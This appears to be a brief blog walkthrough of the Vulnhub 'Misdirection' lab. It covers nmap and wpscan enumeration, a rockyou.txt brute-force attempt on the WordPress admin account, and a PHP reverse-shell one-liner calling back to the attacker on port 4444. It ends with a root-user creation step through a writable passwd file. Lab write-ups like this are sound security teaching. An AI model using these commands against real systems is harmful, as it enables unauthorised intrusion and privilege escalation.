Vulnhub Misdirection Walkthrough

We start by scanning the host with nmap –A –T4 –p- –vv

Scanned the host with dirb but nothing important, then scanned it again butt wit port 8080 :

The host is running WordPress as we can see from the scan result, so wpscan –url -e :

We have admin account on the scan result, so let’s brute force it with

wpscan –url -P /root/pass/rockyou.txt –U admin

and after a while it came to be a waste of time .because gave a page

Then I was able to get a shell back to my machine :

php -r ‘$sock=fsockopen(“”,4444);exec(“/bin/sh -i <&3 >&3 2>&3”);’

Here I transferred using wget and SimpleHTTPServer to the /tmp folder and gave me results.

we can see the user brexit can write to passwd file so we are going to create new user with root privileges

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s